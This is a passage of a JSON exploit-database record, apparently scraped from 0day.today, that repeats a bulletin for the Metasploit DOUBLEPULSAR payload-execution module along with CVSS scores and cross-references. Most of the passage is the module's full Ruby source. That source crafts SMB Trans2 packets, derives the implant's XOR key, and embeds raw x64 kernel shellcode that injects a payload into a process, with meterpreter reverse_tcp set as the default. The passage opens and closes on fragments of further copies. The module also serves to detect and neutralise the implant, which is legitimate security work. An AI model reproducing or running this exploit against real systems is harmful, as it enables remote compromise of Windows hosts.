\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-05] #"}, "lastseen": "2021-11-04T22:17:15", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f7b4a950dfa38196577777902e8186fb", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-11-07T11:46:50", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236", 
"PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0203", "CPAI-2017-0198", "CPAI-2017-0177"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-07T11:46:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-07T11:46:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload', {}],\n ['Neutralize implant', {}]\n ],\n 
'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack('V').first\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n vprint_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n vprint_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n vprint_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = 
sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\n 
\"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n"}, "lastseen": "2021-11-07T11:46:50", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "8bc0c205d41faf4fcc6b0513937f8e66", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
